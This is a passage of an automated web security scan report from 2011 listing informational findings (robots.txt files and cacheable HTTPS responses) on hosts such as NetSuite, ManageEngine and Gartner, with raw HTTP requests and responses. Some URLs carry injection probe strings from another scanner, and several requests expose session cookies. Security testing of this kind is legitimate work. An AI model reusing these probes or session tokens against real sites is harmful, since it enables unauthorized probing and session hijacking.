X-CDN: Cotendo
Connection: close

User-agent: *
Disallow: /

28.47. http://wtssdc.gartner.com/dcs2kf7dq10000sddxi7bvt9i_6o7e/dcs.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://wtssdc.gartner.com
Path:	/dcs2kf7dq10000sddxi7bvt9i_6o7e/dcs.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: wtssdc.gartner.com

Response

HTTP/1.1 200 OK
Content-Length: 277
Content-Type: text/plain
Last-Modified: Fri, 10 Mar 2006 19:37:06 GMT
Accept-Ranges: bytes
ETag: "09d6037a44c61:b1d"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 25 Apr 2011 12:10:48 GMT
Connection: close

##############################
#
# WebTrends SmartSource Data Collector
# Copyright (c) 1996-2006 WebTrends Inc. All rights reserved.
# $DateTime: 2006/02/08 13:22:46 $
#
######################
...[SNIP]...

28.48. http://www.gartner.com/DisplayDocument previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gartner.com
Path:	/DisplayDocument

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gartner.com

Response

HTTP/1.1 200 OK
Connection: Close
Content-type: text/plain
Last-modified: Tue, 18 Jan 2011 21:15:30 GMT
Date: Mon, 25 Apr 2011 12:10:49 GMT
Content-Length: 1129
ETag: "pv32d6cbe24ccfa11263b07ca258ef7257"
Expires: Wed, 27 Apr 2011 12:10:49 GMT
Age: 2080
Cache-Control: public, s-maxage=3600, max-age=172800
X-PvInfo: [S10101.C10821.A150986.RA0.G24F27.U2AE07660].[OT/plaintext.OG/documents]
Vary: Accept-Encoding
Accept-Ranges: bytes
Set-Cookie: TS83f541=3d1d2dfcfff196d359e2ca52a278baafb490c0454f080e824db564c8; Path=/

# robots.txt for http://www.gartner.com/
# Updated: 18 Jan 2011
User-agent: *
Disallow:/0_admin/PasswordRequest.jsp
Disallow:/0_admin/adm_help.jsp
Disallow:/2_events/audioconferences/
Disallow:/2_ev
...[SNIP]...

28.49. http://www.google-analytics.com/__utm.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google-analytics.com
Path:	/__utm.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.google-analytics.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 10 Jan 2011 11:53:04 GMT
Date: Mon, 25 Apr 2011 12:01:22 GMT
Expires: Mon, 25 Apr 2011 12:01:22 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /siteopt.js
Disallow: /config.js

28.50. http://www.googleadservices.com/pagead/conversion/1072501689/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.googleadservices.com
Path:	/pagead/conversion/1072501689/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.googleadservices.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 28 Feb 2011 19:38:06 GMT
Date: Mon, 25 Apr 2011 12:12:13 GMT
Expires: Mon, 25 Apr 2011 12:12:13 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

28.51. http://www.igotyourindex.com/igyindex.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.igotyourindex.com
Path:	/igyindex.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.igotyourindex.com

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:18:26 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Tue, 22 Mar 2011 16:50:10 GMT
ETag: "1fb0a6a-17-49f150989d480"
Accept-Ranges: bytes
Content-Length: 23
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

28.52. http://www.iveco-ptc.spb.ru/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.iveco-ptc.spb.ru
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.iveco-ptc.spb.ru

Response

HTTP/1.1 200 OK
Server: nginx/1.0.0
Date: Mon, 25 Apr 2011 14:32:49 GMT
Content-Type: text/plain; charset=UTF-8
Connection: close
Last-Modified: Tue, 19 Apr 2011 09:32:23 GMT
ETag: "205e87-dc-4a1422f75b7c0"
Accept-Ranges: bytes
Content-Length: 220

User-agent: *
Disallow: /home
Disallow: /infor.html
Disallow: /catalog-detail-1/u/1/1
Disallow: /catalog-detail-1/n/10
Disallow: /catalog-detail-1/u/1/5
Disallow: /404
Disallow: /*?_openstat=*
Host: w
...[SNIP]...

28.53. http://www.livejournal.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.livejournal.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.livejournal.com

Response

HTTP/1.1 200 OK
Server: GoatProxy 1.0
Date: Mon, 25 Apr 2011 14:27:56 GMT
Content-Type: text/plain; charset=UTF-8
Connection: close
X-AWS-Id: ws47
Last-Modified: Wed, 01 Sep 2010 19:32:58 GMT
ETag: "150b1e0-1b6-48f37c3cfee80"
Accept-Ranges: bytes
Content-Length: 438
X-Varnish: 596074119
Age: 0
Via: 1.1 varnish

User-Agent: *
Disallow: /directory.bml

Sitemap: http://www.livejournal.com/sitemap.xml

#
# Blocked journals aren't listed here because robots.txt files
# can't be above 50k or so, depending on the s
...[SNIP]...

28.54. http://www.manageengine.com/products/security-manager/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.manageengine.com
Path:	/products/security-manager/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.manageengine.com

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:11:54 GMT
Server: Apache
Last-Modified: Mon, 07 Mar 2011 12:39:16 GMT
ETag: "4e7-49de3c8a16500"
Accept-Ranges: bytes
Content-Length: 1255
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

# ------------------------------------------
# ZOHO Corp. -- http://www.manageengine.com
# Robot Exclusion File -- robots.txt
# Author: Webmaster
# Last Updated: 16/06/10
# ------------------------
...[SNIP]...

28.55. https://www.manageengine.com/products/security-manager/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.manageengine.com
Path:	/products/security-manager/index.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.manageengine.com

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:13:52 GMT
Server: Apache
Last-Modified: Mon, 07 Mar 2011 12:39:16 GMT
ETag: "4e7-49de3c8a16500"
Accept-Ranges: bytes
Content-Length: 1255
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

# ------------------------------------------
# ZOHO Corp. -- http://www.manageengine.com
# Robot Exclusion File -- robots.txt
# Author: Webmaster
# Last Updated: 16/06/10
# ------------------------
...[SNIP]...

28.56. http://www.marketgid.com/pnews/773204/i/7269/pp/2/1/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.marketgid.com
Path:	/pnews/773204/i/7269/pp/2/1/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.marketgid.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:31:35 GMT
Content-Type: text/plain
Connection: close
Content-Length: 204

User-agent: *
Disallow: /search/
Disallow: /redirect/
Disallow: /news/
Disallow: /rnews/

User-agent: Yandex
Disallow: /search/
Disallow: /redirect/
Disallow: /news/
Disallow: /rnews/
Host: marketgid.
...[SNIP]...

28.57. http://www.netsuite.com/pages/portal/page_not_found.jspinternal=T previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netsuite.com
Path:	/pages/portal/page_not_found.jspinternal=T

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.netsuite.com

Response

HTTP/1.0 200 OK
Server: Apache
Content-Length: 195
Content-Disposition: inline;filename="robots.txt"
NS_RTIMER_COMPOSITE: 1564598317:73686F702D6A6176613031362E7376616C652E6E65746C65646765722E636F6D:80
NLCacheNote: FromMediaCache=T
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Content-Type: text/plain; charset=UTF-8
Cache-Control: max-age=2823
Date: Mon, 25 Apr 2011 15:13:51 GMT
Connection: close

User-Agent: *
Disallow: /portal/pdf/tos.pdf

Crawl-Delay: 10
User-Agent: *
Disallow: /portal/resource/terms_of_service.shtml

User-Agent: *
Disallow: /portal/resource/terms-of-service.shtml

28.58. http://www.smpone.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.smpone.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.smpone.com

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:17:47 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Tue, 03 May 2005 10:21:00 GMT
ETag: "2060f40-18-3f63118cc3b00"
Accept-Ranges: bytes
Content-Length: 24
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

28.59. http://www.tresware.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.tresware.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tresware.com

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:18:21 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Tue, 03 May 2005 11:21:00 GMT
ETag: "1ff8873-18-3f631ef5fdf00"
Accept-Ranges: bytes
Content-Length: 24
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

28.60. http://www.trucklist.ru/cars/trucks previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.trucklist.ru
Path:	/cars/trucks

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.trucklist.ru

Response

HTTP/1.1 200 OK
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 14:38:02 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 113
Last-Modified: Tue, 14 Dec 2010 10:51:53 GMT
Connection: close
Accept-Ranges: bytes

User-Agent: *
Disallow: /help/
Disallow: /login/
Disallow: /sign-up/
Disallow: /cars/search/
Disallow: /*field*

29. Cacheable HTTPS response previous next
There are 25 instances of this issue:

https://checkout.netsuite.com/c.438708/js/eset-netsuite.js
https://checkout.netsuite.com/c.438708/js/lib/mbox.js
https://checkout.netsuite.com/c.438708/js/lib/mootools-1.2.4-core-yc.js
https://checkout.netsuite.com/empty.html
https://checkout.netsuite.com/pages/portal/page_not_found.jsp
https://checkout.netsuite.com/robots.txt
https://checkout.netsuite.com/s.nl
https://customer.kronos.com/Default.asp
https://employer.unicru.com/asp/home/login.asp
https://forms.netsuite.com/pages/portal/page_not_found.jsp
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/index.cfm
https://hourly.deploy.com/hmc/report/index.cfm/%22ns=%22netsparker(0x000042)
https://hourly.deploy.com/hmc/report/index.cfm/%2522ns%253D%2522netsparker%25280x000048%2529)
https://store.manageengine.com/
https://store.manageengine.com/service-desk/index.html
https://system.netsuite.com/pages/customerlogin.jsp
https://www.depthsecurity.com/company.aspx
https://www.depthsecurity.com/contact-us.aspx
https://www.depthsecurity.com/professional-services.aspx
https://www.depthsecurity.com/services.aspx
https://www.fusionvm.com/FusionVM/DesktopDefault.aspx
https://www.manageengine.com/network-performance-management.html
https://www.manageengine.com/products/security-manager/index.html
https://www.manageengine.com/products/security-manager/security-manager-forum.html

29.1. https://checkout.netsuite.com/c.438708/js/eset-netsuite.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://checkout.netsuite.com
Path:	/c.438708/js/eset-netsuite.js

Request

GET /c.438708/js/eset-netsuite.js HTTP/1.1
Host: checkout.netsuite.com
Connection: keep-alive
Referer: https://checkout.netsuite.com/s.nl?c=438708&sc=4&whence=&n=1&ext=T&redirect_count=1&did_javascript_redirect=T
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=1J6WN1GLD7YF97mg4NnnrJtMTLyyBTLW5SC2xnzp2bL1BkKjmqzhQtgw4LDqyWffYxnJ5rLVX4VWGGxBLnQ6WdW126sPpQ9GcKxyvKTvtWBTh6tB9XplC3VFTz911rXl!1384455285; NLVisitorId=rcHW8415AZeYvnmq; NLShopperId=rcHW8415AciYvvMS; NS_VER=2011.1.0; mbox=check#true#1303741628|session#1303736347554-914602#1303743428|PC#1303736347554-914602.17#1304951168

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:25:58 GMT
Server: Apache
Cache-Control: max-age=604800
Content-Length: 25336
Content-Disposition: inline;filename="eset-netsuite.js"
NS_RTIMER_COMPOSITE: -1700559788:616363742D6A6176613032372E7376616C652E6E65746C65646765722E636F6D:80
NLCacheNote: FromMediaCache=T
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=970
Connection: Keep-Alive
Content-Type: application/octet-stream; charset=UTF-8

// Version 1.6

var ESET_Netsuite = {
currentpage: '',
locale: 'en_US',
customer: '438708',
country: 'US',

init: function() {
if($('__locale')) {
this.locale = $('__locale').get('
...[SNIP]...

29.2. https://checkout.netsuite.com/c.438708/js/lib/mbox.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://checkout.netsuite.com
Path:	/c.438708/js/lib/mbox.js

Request

GET /c.438708/js/lib/mbox.js HTTP/1.1
Host: checkout.netsuite.com
Connection: keep-alive
Referer: https://checkout.netsuite.com/s.nl?c=438708&sc=4&whence=&n=1&ext=T&redirect_count=1&did_javascript_redirect=T
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mbox=check#true#1303741608|session#1303736347554-914602#1303743408|PC#1303736347554-914602.17#1304951149; JSESSIONID=1J6WN1GLD7YF97mg4NnnrJtMTLyyBTLW5SC2xnzp2bL1BkKjmqzhQtgw4LDqyWffYxnJ5rLVX4VWGGxBLnQ6WdW126sPpQ9GcKxyvKTvtWBTh6tB9XplC3VFTz911rXl!1384455285; NLVisitorId=rcHW8415AZeYvnmq; NLShopperId=rcHW8415AciYvvMS; NS_VER=2011.1.0

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:25:55 GMT
Server: Apache
Cache-Control: max-age=604800
Content-Length: 20200
Content-Disposition: inline;filename="mbox.js"
NS_RTIMER_COMPOSITE: -260603124:616363742D6A6176613032372E7376616C652E6E65746C65646765722E636F6D:80
NLCacheNote: FromMediaCache=T
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=994
Connection: Keep-Alive
Content-Type: application/octet-stream; charset=UTF-8

var mboxCopyright = "© 1996-2008. Omniture, Inc. All rights reserved.";mboxUrlBuilder = function(a, b) { this.a = a; this.b = b; this.c = new Array(); this.d = function(e) { return e; }; this.f =
...[SNIP]...

29.3. https://checkout.netsuite.com/c.438708/js/lib/mootools-1.2.4-core-yc.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://checkout.netsuite.com
Path:	/c.438708/js/lib/mootools-1.2.4-core-yc.js

Request

GET /c.438708/js/lib/mootools-1.2.4-core-yc.js HTTP/1.1
Host: checkout.netsuite.com
Connection: keep-alive
Referer: https://checkout.netsuite.com/s.nl?c=438708&sc=4&whence=&n=1&ext=T&redirect_count=1&did_javascript_redirect=T
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mbox=check#true#1303741608|session#1303736347554-914602#1303743408|PC#1303736347554-914602.17#1304951149; JSESSIONID=1J6WN1GLD7YF97mg4NnnrJtMTLyyBTLW5SC2xnzp2bL1BkKjmqzhQtgw4LDqyWffYxnJ5rLVX4VWGGxBLnQ6WdW126sPpQ9GcKxyvKTvtWBTh6tB9XplC3VFTz911rXl!1384455285; NLVisitorId=rcHW8415AZeYvnmq; NLShopperId=rcHW8415AciYvvMS; NS_VER=2011.1.0

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:25:55 GMT
Server: Apache
Cache-Control: max-age=604800
Content-Length: 66867
Content-Disposition: inline;filename="mootools-1.2.4-core-yc.js"
NS_RTIMER_COMPOSITE: -1256659311:616363742D6A6176613032372E7376616C652E6E65746C65646765722E636F6D:80
NLCacheNote: FromMediaCache=T
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=970
Connection: Keep-Alive
Content-Type: application/octet-stream; charset=UTF-8

//MooTools, <http://mootools.net>, My Object Oriented (JavaScript) Tools. Copyright (c) 2006-2009 Valerio Proietti, <http://mad4milk.net>, MIT Style License.

var MooTools={version:"1.2.4",build:"0d91
...[SNIP]...

29.4. https://checkout.netsuite.com/empty.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://checkout.netsuite.com
Path:	/empty.html

Request

GET /empty.html HTTP/1.1
Host: checkout.netsuite.com
Connection: keep-alive
Referer: https://checkout.netsuite.com/s.nl/c.438708/n.1/sc.4/.f?ext=T&login=T&reset=T&newcust=T&noopt=T
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=1J6WN1GLD7YF97mg4NnnrJtMTLyyBTLW5SC2xnzp2bL1BkKjmqzhQtgw4LDqyWffYxnJ5rLVX4VWGGxBLnQ6WdW126sPpQ9GcKxyvKTvtWBTh6tB9XplC3VFTz911rXl!1384455285; NLVisitorId=rcHW8415AZeYvnmq; NLShopperId=rcHW8415AciYvvMS; NS_VER=2011.1.0; mbox=session#1303736347554-914602#1303743995|PC#1303736347554-914602.17#1304951735|check#true#1303742195

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:35:25 GMT
Server: Apache
Cache-Control: private
Cache-Control: max-age=56400
Accept-Ranges: bytes
Content-Length: 168
Expires: Tue, 26 Apr 2011 06:15:25 GMT
Last-Modified: Thu, 21 Apr 2011 07:00:00 GMT
NS_RTIMER_COMPOSITE: -1598180205:616363742D6A6176613032372E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=999
Connection: Keep-Alive
Content-Type: text/html

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<META NAME="ROBOTS" CONTENT="NOINDEX, NOFOLLOW">
</head>
<body>
</body>
</html>

29.5. https://checkout.netsuite.com/pages/portal/page_not_found.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://checkout.netsuite.com
Path:	/pages/portal/page_not_found.jsp

Request

HEAD /pages/portal/page_not_found.jsp?internal=F HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=dr9LN1Gcsnv0hQn9pSF9dZtY69V5GT6wWLx5pbn5zqyTN5K0By5hSnyCLpkp16zsn8jTQzcvVTNZSwMD4mG6WZmpmLChGK6FncvhBpQv6KGffqpM2fHyGlYVz2GpQM2Y!-979559123; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AXICDie_; NS_VER=2011.1.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:26:41 GMT
Server: Apache
NS_RTIMER_COMPOSITE: 2000605877:616363742D6A6176613032302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 0

29.6. https://checkout.netsuite.com/robots.txt previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://checkout.netsuite.com
Path:	/robots.txt

Request

Response

29.7. https://checkout.netsuite.com/s.nl previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://checkout.netsuite.com
Path:	/s.nl

Request

GET /s.nl?c=438708&sc=4NS_NO&whence=3&n=1&ext=T&redirect_count=1&did_javascript_redirect=T HTTP/1.1
Referer: https://checkout.netsuite.com/s.nl?c=438708&sc=4&whence=&n=1&ext=T
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=bqgtN1FCvmPZxcX2b3nD1qst0hJBbncQpX4mKyTQTv3pKCPvkLf29Tn7kwyJ26VCKpZhYV7XrhkXjJj2Gpvsp7WCw27FDpnZHWQvTGR8X2G2TXlJDxhnb90YJrRhDJ1B!-979559123; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AXICDie_; NS_VER=2011.1.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:28:52 GMT
Server: Apache
Expires: 0
Last-Modified: Mon, 25 Apr 2011 14:28:51 GMT
NS_RTIMER_COMPOSITE: -368823693:616363742D6A6176613032302E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: NLShopperId=rcHW8495AXICDie_; domain=checkout.netsuite.com; expires=Monday, 02-May-2011 14:28:53 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 26741

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Checkout - ESET North America</title>

<script type="text/javascript">
var gaJsHost = (("https:" == document
...[SNIP]...

29.8. https://customer.kronos.com/Default.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://customer.kronos.com
Path:	/Default.asp

Request

Response

29.9. https://employer.unicru.com/asp/home/login.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://employer.unicru.com
Path:	/asp/home/login.asp

Request

Response

29.10. https://forms.netsuite.com/pages/portal/page_not_found.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://forms.netsuite.com
Path:	/pages/portal/page_not_found.jsp

Request

GET /pages/portal/page_not_found.jsp?internal=F HTTP/1.1
Host: forms.netsuite.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bn_u=6923519460848807096; mbox=session#1303736347554-914602#1303744342|PC#1303736347554-914602.17#1366814482|check#true#1303742542

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:14:16 GMT
Server: Apache
NS_RTIMER_COMPOSITE: -354339471:616363742D6A6176613035312E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=953
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 11320

<html><head><title>NetSuite | Page Not Found</title>
<meta name="robots" content="noindex,nofollow">
<link rel="STYLESHEET" type="text/css" href="/pages/portal/css/main.css">
</head>
<body bgcolor
...[SNIP]...

29.11. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Request

Response

29.12. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Request

Response

29.13. https://hourly.deploy.com/hmc/report/index.cfm/%22ns=%22netsparker(0x000042) previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm/%22ns=%22netsparker(0x000042)

Request

Response

29.14. https://hourly.deploy.com/hmc/report/index.cfm/%2522ns%253D%2522netsparker%25280x000048%2529) previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm/%2522ns%253D%2522netsparker%25280x000048%2529)

Request

Response

29.15. https://store.manageengine.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://store.manageengine.com
Path:	/

Request

GET / HTTP/1.1
Host: store.manageengine.com
Connection: keep-alive
Referer: http://www.manageengine.com/products/applications_manager/application-performance-management.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208542606.1303732848.2.2.utmgclid=CL-9_6TPt6gCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=208542606.1253035426.1303526945.1303526945.1303732848.2; __utmc=208542606; __utmb=208542606.10.10.1303732848

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:13:43 GMT
Server: Apache
Last-Modified: Mon, 25 Apr 2011 10:56:23 GMT
ETag: "4d5bdaa-12c1f-4a1bc0eea43c0"
Accept-Ranges: bytes
Cache-Control: max-age=31536000
Expires: Tue, 24 Apr 2012 12:13:43 GMT
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 76831

<html>
<head>

<title>ManageEngine Store</title>
<!-- InstanceEndEdi
...[SNIP]...

29.16. https://store.manageengine.com/service-desk/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://store.manageengine.com
Path:	/service-desk/index.html

Request

Response

29.17. https://system.netsuite.com/pages/customerlogin.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://system.netsuite.com
Path:	/pages/customerlogin.jsp

Request

Response

29.18. https://www.depthsecurity.com/company.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.depthsecurity.com
Path:	/company.aspx

Request

Response

29.19. https://www.depthsecurity.com/contact-us.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.depthsecurity.com
Path:	/contact-us.aspx

Request

Response

29.20. https://www.depthsecurity.com/professional-services.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.depthsecurity.com
Path:	/professional-services.aspx

Request

Response

29.21. https://www.depthsecurity.com/services.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.depthsecurity.com
Path:	/services.aspx

Request

Response

29.22. https://www.fusionvm.com/FusionVM/DesktopDefault.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.fusionvm.com
Path:	/FusionVM/DesktopDefault.aspx

Request

GET /FusionVM/DesktopDefault.aspx HTTP/1.1
Host: www.fusionvm.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
